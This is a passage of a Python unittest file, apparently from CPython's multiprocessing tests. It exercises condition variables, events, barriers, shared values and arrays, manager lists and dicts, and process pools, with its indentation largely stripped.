self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.monotonic()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.monotonic() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=support.LONG_TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(60))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 60)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
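# For example, several processes can share one _DummyList: each append() bumps a
# shared counter under a lock, and len() reads the current count back.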
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
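# Callable used as a Barrier "action": appends True to the given list-like object
# exactly once per barrier cycle (see test_action below).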
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
close_queue(queue)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
self.addCleanup(p.join)
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('q', 2 ** 33, 2 ** 34),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
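# Illustrative sketch (added for clarity, never called by the tests): the
# size-only form of multiprocessing.Array zero-fills its buffer and supports
# slice assignment through the synchronized proxy, as test_array and
# test_array_from_size above exercise. The ``_demo_array_zero_init`` helper
# name is an assumption introduced here for illustration only.
def _demo_array_zero_init():
    import multiprocessing
    arr = multiprocessing.Array('i', 4)   # size-only form: buffer starts as [0, 0, 0, 0]
    arr[:] = range(4)                     # slice assignment through the proxy
    with arr.get_lock():                  # the default wrapper exposes its lock
        arr[0] += 10
    return list(arr)                      # [10, 1, 2, 3]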
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_iter(self):
a = self.list(list(range(10)))
it = iter(a)
self.assertEqual(list(it), list(range(10)))
self.assertEqual(list(it), []) # exhausted
# list modified during iteration
it = iter(a)
a[0] = 100
self.assertEqual(next(it), 100)
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_iter(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
it = iter(d)
self.assertEqual(list(it), indices)
self.assertEqual(list(it), []) # exhausted
# dictionary changed size during iteration
it = iter(d)
d.clear()
self.assertRaises(RuntimeError, next, it)
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
class CountedObject(object):
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
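# Illustrative sketch (added for clarity, never called by the tests): the basic
# Pool workflow that _TestPool below exercises -- context-managed construction,
# a blocking map(), and an asynchronous apply_async(). It reuses the
# module-level sqr() and mul() helpers; the ``_demo_pool_roundtrip`` name is an
# assumption introduced here for illustration only.
def _demo_pool_roundtrip():
    import multiprocessing
    with multiprocessing.Pool(2) as pool:
        squares = pool.map(sqr, range(5))        # [0, 1, 4, 9, 16]
        async_result = pool.apply_async(mul, (6, 7))
        product = async_result.get(timeout=10)   # 42
    return squares, product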
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
    def test_map_unpicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
        # SayWhenError raised at the very start of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
        # SayWhenError raised at the very start of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
        # SayWhenError raised at the start of the problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(10)))
self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
        # SayWhenError raised at the very start of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
